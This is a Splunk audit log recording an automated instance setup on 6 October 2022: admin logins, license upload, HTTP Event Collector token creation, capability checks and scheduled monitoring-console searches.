Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_search_server, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_dist_peer, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_deployment_client, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=list_deployment_client, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=fsh_manage, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_search_server, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_dist_peer, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_monitor, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_udp, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_tcp, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_splunktcp, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_scripted, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_monitor, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_token_http, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=restart_splunkd, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=change_authentication, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_tcp_stream, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_upload_and_index, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_tcp_stream, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_upload_and_index, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.666, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.666, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.666, user=admin, action=rest_apps_view, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.660, user=admin, action=edit_user, info=granted object="admin" operation=edit] Audit:[timestamp=10-06-2022 17:35:56.660, user=admin, action=edit_user, info=granted object="admin" operation=list] Audit:[timestamp=10-06-2022 17:35:56.027, user=admin, action=search, info=granted REST: /search/timeparser/tz] Audit:[timestamp=10-06-2022 17:35:55.275, user=admin, action=edit_user, info=granted object="admin" operation=edit] Audit:[timestamp=10-06-2022 17:35:55.275, user=admin, action=edit_user, info=granted object="admin" operation=list] Audit:[timestamp=10-06-2022 17:35:55.266, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:35:55.115, user=admin, action=login attempt, info=succeeded reason=user-initiated useragent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" clientip=10.56.227.188" method=Splunk" session=f3000feb2231672df44853224bd304c2] Audit:[timestamp=10-06-2022 17:35:49.545, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:35:19.507, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:35:08.717, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:35:08.578, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:35:07.827, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:34:49.469, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:34:19.452, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:33:49.428, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:33:30.268, user=admin, action=rest_properties_get, info=granted REST: /properties/web/settings/enableSplunkWebSSL] Audit:[timestamp=10-06-2022 17:33:30.268, user=admin, action=login attempt, info=succeeded reason=user-initiated useragent="python-requests/2.27.1" clientip=10.224.10.142" method=Splunk" session=2e1037ab7c1f75d5cb0a8bfe67e64822] Audit:[timestamp=10-06-2022 17:33:19.390, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:32:49.352, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:32:36.307, user=splunk-system-user, action=search, info=completed, search_id='scheduler__nobody_c3BsdW5rX21vbml0b3JpbmdfY29uc29sZQ__RMD54740dfff07b17ef1_at_1665077495_0', has_error_warn=true, fully_completed_search=true, total_run_time=0.08, event_count=0, result_count=4, available_count=0, scan_count=0, drop_count=0, exec_time=1665077526, api_et=N/A, api_lt=1665077495.000000000, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=1665077495.000000000, is_realtime=0, savedsearch_name="DMC Asset - Build Standalone Asset Table", search_startup_time="110", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_splunk_monitoring_console_nobody_8347240b74661a93", app="splunk_monitoring_console", provenance="scheduler", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, search_type=scheduled, roles='admin+power+splunk-system-role+user', search='| `dmc_get_local_instance_asset` | rename search_groups AS search_group | inputlookup append=true dmc_assets | stats last(*) AS * by peerURI, search_group | fields peerURI serverName host machine search_group'] Audit:[timestamp=10-06-2022 17:32:36.306, user=splunk-system-user, action=search, info=completed, search_id='subsearch_scheduler__nobody_c3BsdW5rX21vbml0b3JpbmdfY29uc29sZQ__RMD54740dfff07b17ef1_at_1665077495_0_1665077526.1', has_error_warn=false, fully_completed_search=true, total_run_time=0.02, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665077526, api_et=N/A, api_lt=1665077495.000000000, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=1665077495.000000000, is_realtime=0, savedsearch_name="", search_startup_time="12", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_splunk_monitoring_console_nobody_aa8ca68d5987d8ab", app="splunk_monitoring_console", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+splunk-system-role+user', search=' | rest /services/search/distributed/groups splunk_server=local | fields + title, member | where isnotnull(mvfind(member,"localhost:localhost")) | eval peerURI="localhost" | rename title as search_groups | fields + peerURI, search_groups | mvcombine delim=" " search_groups'] Audit:[timestamp=10-06-2022 17:32:19.329, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:32:06.531, user=splunk-system-user, action=quota,search_id=scheduler__nobody_c3BsdW5rX21vbml0b3JpbmdfY29uc29sZQ__RMD54740dfff07b17ef1_at_1665077495_0, elapsed_ms=1, cache_size=2] Audit:[timestamp=10-06-2022 17:32:06.529, user=splunk-system-user, action=search, info=granted , search_id='scheduler__nobody_c3BsdW5rX21vbml0b3JpbmdfY29uc29sZQ__RMD54740dfff07b17ef1_at_1665077495_0', search='| `dmc_get_local_instance_asset` | rename search_groups AS search_group | inputlookup append=true dmc_assets | stats last(*) AS * by peerURI, search_group | fields peerURI serverName host machine search_group', autojoin='1', buckets=0, ttl=120, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='Thu Oct 6 17:31:35 2022', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="DMC Asset - Build Standalone Asset Table", search_type="scheduled", is_proxied=false, app="splunk_monitoring_console", provenance="scheduler", mode="historical"] Audit:[timestamp=10-06-2022 17:32:06.307, user=splunk-system-user, action=search, info=completed, search_id='alertsmanager_1665077484.1', has_error_warn=false, fully_completed_search=true, total_run_time=0.12, event_count=0, result_count=0, available_count=0, scan_count=1, drop_count=0, exec_time=1665077484, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=1664472684.000000000, search_lt=1665077484.516392000, is_realtime=0, savedsearch_name="", search_startup_time="536", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_nobody_3898ce77c20fe891", app="search", provenance="N/A", mode="historical_batch", is_proxied=false, searched_buckets=1, eliminated_buckets=0, considered_events=1, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=21, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+splunk-system-role+user', search='search earliest_time=-7d splunk_server=local index=_audit sid trigger_time action=alert_* (expiration>1665077484 OR NOT expiration=*) | rex ",\s*ss_name=\"(?(?:[^\"]+|\"(?!,\s*sid=))*)\",\s*sid=\""| rex ",\s*sid=\"(?(?:[^\"]+|\"(?!,\s*alert_actions=))*)\",\s*alert_actions=\""| stats sum(deleted) AS deleted, list(alert_actions) AS alert_actions, list(severity) AS severity, list(expiration) AS expiration list(ss_name) AS ss_name, list(ss_app) AS ss_app, list(ss_user) AS ss_user list(digest_mode) AS digest_mode, list(triggered_alerts) AS triggered_alerts BY sid, trigger_time | search NOT deleted=* OR deleted=0 | fields - deleted '] Audit:[timestamp=10-06-2022 17:32:06.306, user=splunk-system-user, action=search, info=completed, search_id='alertsmanager_1665077506.1', has_error_warn=false, fully_completed_search=true, total_run_time=0.13, event_count=0, result_count=0, available_count=0, scan_count=1, drop_count=0, exec_time=1665077506, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=1664472706.000000000, search_lt=1665077506.590609000, is_realtime=0, savedsearch_name="", search_startup_time="135", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_nobody_427be9ed68ee1b5a", app="search", provenance="N/A", mode="historical_batch", is_proxied=false, searched_buckets=2, eliminated_buckets=0, considered_events=1, total_slices=1, decompressed_slices=1, duration.command.search.index=1, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=21, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+splunk-system-role+user', search='search earliest_time=-7d splunk_server=local index=_audit sid trigger_time action=alert_* (expiration>1665077506 OR NOT expiration=*) | rex ",\s*ss_name=\"(?(?:[^\"]+|\"(?!,\s*sid=))*)\",\s*sid=\""| rex ",\s*sid=\"(?(?:[^\"]+|\"(?!,\s*alert_actions=))*)\",\s*alert_actions=\""| stats sum(deleted) AS deleted, list(alert_actions) AS alert_actions, list(severity) AS severity, list(expiration) AS expiration list(ss_name) AS ss_name, list(ss_app) AS ss_app, list(ss_user) AS ss_user list(digest_mode) AS digest_mode, list(triggered_alerts) AS triggered_alerts BY sid, trigger_time | search NOT deleted=* OR deleted=0 | fields - deleted '] Audit:[timestamp=10-06-2022 17:31:49.310, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:31:46.490, user=splunk-system-user, action=quota,search_id=alertsmanager_1665077506.1, elapsed_ms=1, cache_size=1] Audit:[timestamp=10-06-2022 17:31:46.487, user=splunk-system-user, action=search, info=granted , search_id='alertsmanager_1665077506.1', search='search earliest_time=-7d splunk_server=local index=_audit sid trigger_time action=alert_* (expiration>1665077506 OR NOT expiration=*) | rex ",\s*ss_name=\"(?(?:[^\"]+|\"(?!,\s*sid=))*)\",\s*sid=\""| rex ",\s*sid=\"(?(?:[^\"]+|\"(?!,\s*alert_actions=))*)\",\s*alert_actions=\""| stats sum(deleted) AS deleted, list(alert_actions) AS alert_actions, list(severity) AS severity, list(expiration) AS expiration list(ss_name) AS ss_name, list(ss_app) AS ss_app, list(ss_user) AS ss_user list(digest_mode) AS digest_mode, list(triggered_alerts) AS triggered_alerts BY sid, trigger_time | search NOT deleted=* OR deleted=0 | fields - deleted ', autojoin='0', buckets=0, ttl=300, max_count=50000, maxtime=8640000, enable_lookups='1', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 17:31:39.662, user=admin, action=login attempt, info=succeeded reason=user-initiated useragent="ansible-httpget" clientip=127.0.0.1" method=Splunk" session=2e1037ab7c1f75d5cb0a8bfe67e64822] Audit:[timestamp=10-06-2022 17:31:39.295, user=admin, action=login attempt, info=succeeded reason=user-initiated useragent="ansible-httpget" clientip=127.0.0.1" method=Splunk" session=2e1037ab7c1f75d5cb0a8bfe67e64822] Audit:[timestamp=10-06-2022 17:31:38.673, user=admin, action=create, info=id=http://splunk_hec_token|disabled=0|token=00000000-0000-0000-0000-000000000000,16c932ab-842a-4a8a-8ae5-26648f293903] Audit:[timestamp=10-06-2022 17:31:38.669, user=admin, action=edit_token_http, info=granted object="http://splunk_hec_token" operation=create] Audit:[timestamp=10-06-2022 17:31:38.668, user=admin, action=login attempt, info=succeeded reason=user-initiated useragent="ansible-httpget" clientip=127.0.0.1" method=Splunk" session=2e1037ab7c1f75d5cb0a8bfe67e64822] Audit:[timestamp=10-06-2022 17:31:38.340, user=admin, action=list_token_http, info=granted object="http://splunk_hec_token" operation=list] Audit:[timestamp=10-06-2022 17:31:38.339, user=admin, action=login attempt, info=succeeded reason=user-initiated useragent="ansible-httpget" clientip=127.0.0.1" method=Splunk" session=2e1037ab7c1f75d5cb0a8bfe67e64822] Audit:[timestamp=10-06-2022 17:31:38.037, user=admin, action=edit, info=id=http|disabled=0|enableSSL=1|port=8088|serverCert=|sslPassword=] Audit:[timestamp=10-06-2022 17:31:38.030, user=admin, action=edit_token_http, info=granted object="http" operation=edit] Audit:[timestamp=10-06-2022 17:31:38.027, user=admin, action=login attempt, info=succeeded reason=user-initiated useragent="ansible-httpget" clientip=127.0.0.1" method=Splunk" session=2e1037ab7c1f75d5cb0a8bfe67e64822] Audit:[timestamp=10-06-2022 17:31:37.290, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:31:32.132, user=n/a, action=splunkStarting, info=n/a] Audit:[timestamp=10-06-2022 17:31:24.426, user=n/a, action=splunkShuttingDown, info=n/a] Audit:[timestamp=10-06-2022 17:31:24.015, user=splunk-system-user, action=quota,search_id=alertsmanager_1665077484.1, elapsed_ms=1, cache_size=0] Audit:[timestamp=10-06-2022 17:31:24.012, user=splunk-system-user, action=search, info=granted , search_id='alertsmanager_1665077484.1', search='search earliest_time=-7d splunk_server=local index=_audit sid trigger_time action=alert_* (expiration>1665077484 OR NOT expiration=*) | rex ",\s*ss_name=\"(?(?:[^\"]+|\"(?!,\s*sid=))*)\",\s*sid=\""| rex ",\s*sid=\"(?(?:[^\"]+|\"(?!,\s*alert_actions=))*)\",\s*alert_actions=\""| stats sum(deleted) AS deleted, list(alert_actions) AS alert_actions, list(severity) AS severity, list(expiration) AS expiration list(ss_name) AS ss_name, list(ss_app) AS ss_app, list(ss_user) AS ss_user list(digest_mode) AS digest_mode, list(triggered_alerts) AS triggered_alerts BY sid, trigger_time | search NOT deleted=* OR deleted=0 | fields - deleted ', autojoin='0', buckets=0, ttl=300, max_count=50000, maxtime=8640000, enable_lookups='1', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 17:31:18.826, user=admin, action=license_edit, info=granted object="/tmp/splunk.lic" operation=create] Audit:[timestamp=10-06-2022 17:31:18.786, user=admin, action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:31:18.786, user=admin, action=license_read, info=denied ] Audit:[timestamp=10-06-2022 17:31:18.786, user=admin, action=login attempt, info=succeeded reason=user-initiated useragent="SplunkCli/6.0 (build e053ef3c985f)" clientip=127.0.0.1" method=Splunk" session=1cb3ef6fbe9e961b0a8aceb592842cab] Audit:[timestamp=10-06-2022 17:31:15.831, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:31:08.920, user=n/a, action=splunkStarting, info=n/a]